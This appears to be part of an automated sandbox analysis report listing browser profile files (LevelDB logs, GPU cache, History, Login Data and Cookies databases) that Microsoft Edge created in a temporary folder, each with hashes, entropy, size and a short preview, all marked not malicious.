                                                                                                                                                              SSDEEP:6:HEFSIq1qLTwi23fQr/UaVdg2KLlVEFSqN+q2PqLTwi23fQr/UaPrqIFUv:koIfwZC0LsoqIv8wZCL3FUv
                                                                                                                                                              MD5:57940239E2CFDDBE813C0994EC2508AB
                                                                                                                                                              SHA1:05F432F4796BA7FE004BEC385344AA0E3EE6FCB6
                                                                                                                                                              SHA-256:8C48F0EEDB9EF4C59FB37CAF08AC1122F7A3647E8EB36D6474C76B3AC5274688
                                                                                                                                                              SHA-512:293E70D8781A6B54A19B2714B77B34726214429EDD61116D9D7C284877FE06B645A7E32035EC5F4DF0D734075CCBD7C792117225BAE4AC7A95F42537551DBC91
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.039 a88 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Rules since it was missing..2024/11/21-05:27:21.166 a88 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Rules/MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Rules\MANIFEST-000001

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Scripts\000001.dbtmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Scripts\000003.log

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):171
                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                                                                              MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                                                                              SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                                                                              SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                                                                              SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Scripts\CURRENT (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Scripts\LOG

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):263
                                                                                                                                                              Entropy (8bit):5.214891963289152
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFSFM+q1qLTwi23fQr/U6FB2KLlVEFSk+q2PqLTwi23fQr/U65IFUv:koFM+fwZC/FFLso5v8wZC/WFUv
                                                                                                                                                              MD5:FF51BAAA50BCA2CB187F186264631436
                                                                                                                                                              SHA1:D0B6777A7AB18282C207C2F4715292A3DA1B2AED
                                                                                                                                                              SHA-256:CF112ABF47F179A1431BDE578797E2A83D5620797135B0EF566DBA1D5F023E64
                                                                                                                                                              SHA-512:8105E2C2AD6E86C8454AD1BC3241C5E3F2FC6140AE097A59CB378B2EC9294C0909B0F0E93C378962255833C55A6C558634EDD7221D1BAEDB341F8BCEDFA61678
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.254 a88 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Scripts since it was missing..2024/11/21-05:27:21.313 a88 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Scripts/MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Scripts\MANIFEST-000001

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Favicons

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.6975083372685086
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:LLiZxh0GY/l1rWR1PmCx9fZjsBX+T6UwcE85fBmI:EBmw6fU1zBmI
                                                                                                                                                              MD5:F5BBD8449A9C3AB28AC2DE45E9059B01
                                                                                                                                                              SHA1:C569D730853C33234AF2402E69C19E0C057EC165
                                                                                                                                                              SHA-256:825FF36C4431084C76F3D22CE0C75FA321EA680D1F8548706B43E60FCF5B566E
                                                                                                                                                              SHA-512:96ACDED5A51236630A64FAE91B8FA9FAB43E22E0C1BCB80C2DD8D4829E03FBFA75AA6438053599A42EC4BBCF805BF0B1E6DFF9069B2BA182AD0BB30F2542FD3F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\GPUCache\data_0

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\GPUCache\data_1

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):270336
                                                                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\GPUCache\data_2

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\GPUCache\data_3

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\GPUCache\index

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):262512
                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:LsNlo//:Ls3o
                                                                                                                                                              MD5:F110E320E08EB43276136574077E2420
                                                                                                                                                              SHA1:62D89145F2D8C91818CDD953CD32546BE1877179
                                                                                                                                                              SHA-256:D2582808DC6C18904FA17C12EF6AA7D7D2B0973430E5BEA20D3DD203E75BA5D7
                                                                                                                                                              SHA-512:B2D05CF7AB2183322DDCE234A752F059D64D46B92782D0C323C9B72F8688D8013592FC6E12A1D7C01640791AACF5243A68E804A6A96C9F66881DA7E1F1D2DFCD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:............................................../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\History

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):155648
                                                                                                                                                              Entropy (8bit):0.5407252242845243
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                              MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                              SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                              SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                              SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\HubApps Icons

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):28672
                                                                                                                                                              Entropy (8bit):0.33890226319329847
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:TLMfly7aoxrRGcAkSQdC6ae1//fxEjkE/RFL2iFV1eHFxOUwa5qgufTsZ75fOSI:TLYcjr0+Pdajk+FZH1W6UwccI5fBI
                                                                                                                                                              MD5:971F4C153D386AC7ED39363C31E854FC
                                                                                                                                                              SHA1:339841CA0088C9EABDE4AACC8567D2289CCB9544
                                                                                                                                                              SHA-256:B6468DA6EC0EAE580B251692CFE24620D39412954421BBFDECB13EF21BE7BC88
                                                                                                                                                              SHA-512:1A4DD0C2BE163AAB3B81D63DEB4A7DB6421612A6CF1A5685951F86B7D5A40B67FC6585B7E52AA0CC20FF47349F15DFF0C9038086E3A7C78AE0FFBEE6D8AA7F7E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Local Storage\leveldb\000001.dbtmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Local Storage\leveldb\CURRENT (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Local Storage\leveldb\LOG

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):273
                                                                                                                                                              Entropy (8bit):5.280718689372398
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFStAAB1qLTwi23fQr/0a2jM8B2KLlVEFSQUXN+q2PqLTwi23fQr/0a2jMGIFUv:kotAAowZC8jFLsoQRv8wZC8EFUv
                                                                                                                                                              MD5:48EF090AEB4C6900922CD7F4A20BED0D
                                                                                                                                                              SHA1:A590F7DC379A13166E83C629D91273BCFAE55689
                                                                                                                                                              SHA-256:362D50404EFAAD719E82DA14A836553793EB9FE66878FD2F81B2415436F31D63
                                                                                                                                                              SHA-512:CF511DD6D4D544C302BFF379DFF56C457A228B4F4A964136277D4DEE72E932321B2482D1E7EF973B0F15D569E1BFFFEB40DB14EB1426D13AC03C5A866062C954
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.396 12b8 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Local Storage\leveldb since it was missing..2024/11/21-05:27:21.529 12b8 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Local Storage\leveldb/MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Local Storage\leveldb\MANIFEST-000001

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Login Data

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):51200
                                                                                                                                                              Entropy (8bit):0.8746135976761988
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Network\61923a97-38bf-4031-88d2-1b7fb3bb403a.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2
                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[]

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Network\Cookies

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.6732424250451717
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Network\Reporting and NEL

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):12288
                                                                                                                                                              Entropy (8bit):0.3237637357343357
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:l9bNFlEuWk8T/l5qKZwkvAngLusiOImWtz0vlWmW8QeZa5qguxtqlyup6YZ75fOV:TLiuWkYl0KONFxOUwa5qguWfpbZ75fOV
                                                                                                                                                              MD5:3EF849ABC9E84C1D19566A9128442C47
                                                                                                                                                              SHA1:E9C70A5823A7A46330A18D51A4413ECFDAF10753
                                                                                                                                                              SHA-256:301CD0F39EB7BBFA37303A5D482614B67A78979F5D761520EDFB16C4BA77EE92
                                                                                                                                                              SHA-512:DFD248A745C1960BFB792FC59F90724DD937D5D431F28E1F6CCBC0F55E551B0818408AD353B88DC83439AF2D7B249C9576B1F1F66838B59865EA9F5644CC9EBF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.......g..g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Network\Reporting and NEL-journal

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4616
                                                                                                                                                              Entropy (8bit):0.49635072460257995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:blgPg9bNFlEuWk8T/l5qKZwkvAngLusiOImWtz0vlWmW8QeZag2:bl4qLiuWkYl0KONFxOUwaV
                                                                                                                                                              MD5:6088AB04C8224CACBFBD9C37421B4D6B
                                                                                                                                                              SHA1:86C85388A9965B16B2E123592F05D29B3D87502C
                                                                                                                                                              SHA-256:E0ED3591992E6B81082C97595407D4BAAC82E560A0B3DF17A413BBE139F0EEEA
                                                                                                                                                              SHA-512:08E19800E501963B3F96732BE25AFDDD650A6295873487AD53F23DC125ABEDE5B0525BEDFF20807366CBF34C00E7CD5C188DD179CC7F31524D765E90CA358F98
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.............Z.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................j.......g..g......................................................................................................................................................................................................................................................................................................................................................................................

